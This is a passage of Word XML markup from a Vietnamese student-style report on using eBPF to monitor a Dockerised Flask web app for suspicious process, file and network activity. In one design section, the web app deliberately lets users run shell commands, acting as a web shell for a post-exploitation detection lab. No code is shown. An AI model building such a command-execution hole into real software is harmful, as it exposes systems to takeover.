        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Khả năng quan sát sâu từ việc thu thập dữ liệu trực tiếp tại kernel và không can thiệp trực tiếp vào kernel cho phép eBPF theo dõi hệ thống ở mức chi tiết với chi phí thấp. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Công cụ eBPF được dùng khi cần giám sát, phân tích hoặc can thiệp sâu vào Linux kernel mà các công cụ User space không đáp ứng được:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="420"/>
          <w:tab w:val="clear" w:pos="1260"/>
        </w:tabs>
        <w:spacing w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1258" w:leftChars="0" w:hanging="418" w:firstLineChars="0"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Observability: thu thập dữ liệu chi tiết về hành vi của hệ thống như CPU, memory, I/O và network latency ngay tại kernel theo thời gian thực.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="420"/>
          <w:tab w:val="clear" w:pos="1260"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1258" w:leftChars="0" w:hanging="418" w:firstLineChars="0"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Networking: cho phép xử lý và lọc gói tin trực tiếp trong kernel, hỗ trợ xây dựng chính sách mạng, quan sát traffic và tối ưu hiệu năng xử lý mà không cần thay đổi kernel.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="420"/>
          <w:tab w:val="clear" w:pos="1260"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1258" w:leftChars="0" w:hanging="418" w:firstLineChars="0"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Security: giám sát syscalls và phát hiện hành vi bất thường như container chạy tiến trình lạ, truy cập file nhạy cảm hoặc kết nối mạng bất thường.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="420"/>
          <w:tab w:val="clear" w:pos="1260"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="0"/>
        <w:ind w:left="1258" w:leftChars="0" w:hanging="418" w:firstLineChars="0"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Tracing: gắn hook vào kernel function hoặc ứng dụng cho phép theo dõi luồng thực thi, đo latency từng bước và xác định điểm nghẽn hiệu năng</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:id="34" w:name="_heading=h.noqs3twqm3o1" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="34"/>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Điểm yếu</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Cơ chế Verifier của eBPF tuy đảm bảo an toàn cho hệ thống nhưng cũng tạo khó khăn cho việc phát triển các chương trình eBPF vì cơ chế này sẽ từ chối tất cả các chương trình có:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="420"/>
          <w:tab w:val="clear" w:pos="1260"/>
        </w:tabs>
        <w:spacing w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1258" w:leftChars="0" w:hanging="418" w:firstLineChars="0"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Vòng lặp không xác định.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="420"/>
          <w:tab w:val="clear" w:pos="1260"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1258" w:leftChars="0" w:hanging="418" w:firstLineChars="0"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Khả năng truy cập bộ nhớ không hợp lệ.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="420"/>
          <w:tab w:val="clear" w:pos="1260"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1258" w:leftChars="0" w:hanging="418" w:firstLineChars="0"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Có độ phức tạp vượt qua giới hạn cho phép.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="420"/>
          <w:tab w:val="clear" w:pos="1260"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="0"/>
        <w:ind w:left="1258" w:leftChars="0" w:hanging="418" w:firstLineChars="0"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Có luồng điều khiển không thể chứng minh là an toàn.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:id="35" w:name="_heading=h.isfmus4mhov7" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="35"/>
      <w:bookmarkStart w:id="36" w:name="_Toc1717014214"/>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>ỨNG DỤNG THỰC TẾ</w:t>
      </w:r>
      <w:bookmarkEnd w:id="36"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>eBPF được ứng dụng rộng rãi trong việc giám sát hệ thống, tối ưu hiệu năng và tăng cường bảo mật hạ tầng tại nhiều tập đoàn công nghệ lớn.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="420"/>
          <w:tab w:val="clear" w:pos="1260"/>
        </w:tabs>
        <w:spacing w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1258" w:leftChars="0" w:hanging="418" w:firstLineChars="0"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Netflix, Linkedin và Google sử dụng eBPF để giám sát lưu lượng mạng, phân tích hiệu năng ứng dụng và thu thập dữ liệu hệ thống ở mức kernel.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="420"/>
          <w:tab w:val="clear" w:pos="1260"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1258" w:leftChars="0" w:hanging="418" w:firstLineChars="0"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Trong lĩnh vực mạng và an ninh mạng, Meta và Cloudflare triển khai eBPF xử lý lưu lượng mạng, cân bằng tải (load balancing) và giám sát lưu lượng theo thời gian thực.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="420"/>
          <w:tab w:val="clear" w:pos="1260"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="0"/>
        <w:ind w:left="1258" w:leftChars="0" w:hanging="418" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Trong môi trường điện toàn đám mây (Cloud Computing), các doanh nghiệp như Microsoft, Datadog và Capital One ứng dụng eBPF để giám sát hoạt động của hệ thống, phát hiện các hành vi bất thường và tăng cường khả năng bảo vệ hạ tầng cloud trước các nguy cơ an ninh.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:id="37" w:name="_heading=h.lq5vcevx7o0x" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="37"/>
      <w:bookmarkStart w:id="38" w:name="_Toc1993472461"/>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>PHÂN TÍCH VÀ THIẾT KẾ HỆ THỐNG</w:t>
      </w:r>
      <w:bookmarkEnd w:id="38"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:id="39" w:name="_heading=h.cakp0gc5yahe" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="39"/>
      <w:bookmarkStart w:id="40" w:name="_Toc437081944"/>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>TỔNG QUAN TRIỂN KHAI HỆ THỐNG</w:t>
      </w:r>
      <w:bookmarkEnd w:id="40"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Hệ thống được triển khai trên một máy chủ Linux, trong đó ứng dụng web được đóng gói và chạy bên trong Docker Container bằng Flask Framework. Đồng thời, trên máy chủ cài đặt một eBPF Agent để giám sát hoạt động của container và thu thập các sự kiện từ kernel Linux.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:id="41" w:name="_heading=h.soz8659hvy4d" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="41"/>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Mục tiêu triển khai</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Xây dựng một web server đơn giản bằng Flask, đóng gói ứng dụng bằng Docker để dễ dàng triển khai trên nhiều môi trường, cho phép người dùng thực thi một số lệnh shell thông quan giao diện web và hiển thị kết quả (bỏ qua bước khai thác web để đơn giản hóa và tập trung vào hậu khai thác - web shell).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Sử dụng eBPF để theo dõi các hoạt động của container như:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="420"/>
          <w:tab w:val="clear" w:pos="1260"/>
        </w:tabs>
        <w:spacing w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1258" w:leftChars="0" w:hanging="418" w:firstLineChars="0"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Tiến trình được tạo (Process creation).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="420"/>
          <w:tab w:val="clear" w:pos="1260"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1258" w:leftChars="0" w:hanging="418" w:firstLineChars="0"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Lệnh được thực thi.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="420"/>
          <w:tab w:val="clear" w:pos="1260"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1258" w:leftChars="0" w:hanging="418" w:firstLineChars="0"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>File được truy cập.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="420"/>
          <w:tab w:val="clear" w:pos="1260"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="0"/>
        <w:ind w:left="1258" w:leftChars="0" w:hanging="418" w:firstLineChars="0"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Các kết nối mạng được tạo.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Hiển thị các sự kiện thu thập được trên Dashboard để phục vụ mục đích giám sát và phân tích.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:id="42" w:name="_heading=h.gn0ql9u2c53a" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="42"/>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Luồng hoạt động của hệ thống</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="420"/>
          <w:tab w:val="clear" w:pos="1260"/>
        </w:tabs>
        <w:spacing w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1258" w:leftChars="0" w:hanging="418" w:firstLineChars="0"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Người dùng truy cập web thông qua trình duyệt.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="420"/>
          <w:tab w:val="clear" w:pos="1260"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1258" w:leftChars="0" w:hanging="418" w:firstLineChars="0"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Flask nhập HTTP Request và định tuyến đến View Function tương ứng.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="420"/>
          <w:tab w:val="clear" w:pos="1260"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1258" w:leftChars="0" w:hanging="418" w:firstLineChars="0"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Người dùng gửi một lệnh Shell:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="420"/>
          <w:tab w:val="clear" w:pos="1260"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="2100" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Flask sử dụng Python để thực thi lệnh trên hệ thống. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="420"/>
          <w:tab w:val="clear" w:pos="1260"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="2100" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Kết quả được trả về giao diện web.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="420"/>
          <w:tab w:val="clear" w:pos="1260"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1258" w:leftChars="0" w:hanging="418" w:firstLineChars="0"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>eBPF bắt sự kiện:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="420"/>
          <w:tab w:val="clear" w:pos="1260"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="2100" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Linux kernel sẽ sinh ra các sự kiện như execve, mở file, tạo process hoặc kết nối mạng.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="420"/>
          <w:tab w:val="clear" w:pos="1260"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="2100" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>eBPF Agent gắn vào các hook của kernel để thu thập các sự kiện này mà không cần sửa đổi mã nguồn kernel.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="420"/>
          <w:tab w:val="clear" w:pos="1260"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="0"/>
        <w:ind w:left="1258" w:leftChars="0" w:hanging="418" w:firstLineChars="0"/>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Dashboard hiển thị các log cho người quản trị theo dõi.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:id="43" w:name="_heading=h.xrq14nyr92at" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="43"/>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Lợi ích của mô hình triển khai</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="420"/>
          <w:tab w:val="clear" w:pos="1260"/>
        </w:tabs>
        <w:spacing w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1258" w:leftChars="0" w:hanging="418" w:firstLineChars="0"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Tính linh hoạt: Docker giúp triển khai nhanh chóng và đồng nhất trên nhiều môi trường.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="420"/>
          <w:tab w:val="clear" w:pos="1260"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1258" w:leftChars="0" w:hanging="418" w:firstLineChars="0"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Tính cô lập: ứng dụng chạy trong container giúp hạn chế ảnh hưởng đến hệ thống host.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="420"/>
          <w:tab w:val="clear" w:pos="1260"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1258" w:leftChars="0" w:hanging="418" w:firstLineChars="0"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Khả năng giám sát: eBPF theo dõi hoạt động của ứng dụng ở mức kernel với chi phí thấp.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="420"/>
          <w:tab w:val="clear" w:pos="1260"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="0"/>
        <w:ind w:left="1258" w:leftChars="0" w:hanging="418" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Khả năng mở rộng: có thể bổ sung thêm nhiều container hoặc Agent để giám sát các dịch vụ khác.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="420"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:id="44" w:name="_heading=h.s4t4hvw75r0s" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="44"/>
      <w:bookmarkStart w:id="45" w:name="_Toc104134879"/>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>THIẾT KẾ CHỨC NĂNG HỆ THỐNG</w:t>
      </w:r>
      <w:bookmarkEnd w:id="45"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:id="46" w:name="_heading=h.q1p4d4psj79s" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="46"/>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cây phân rã chức năng </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
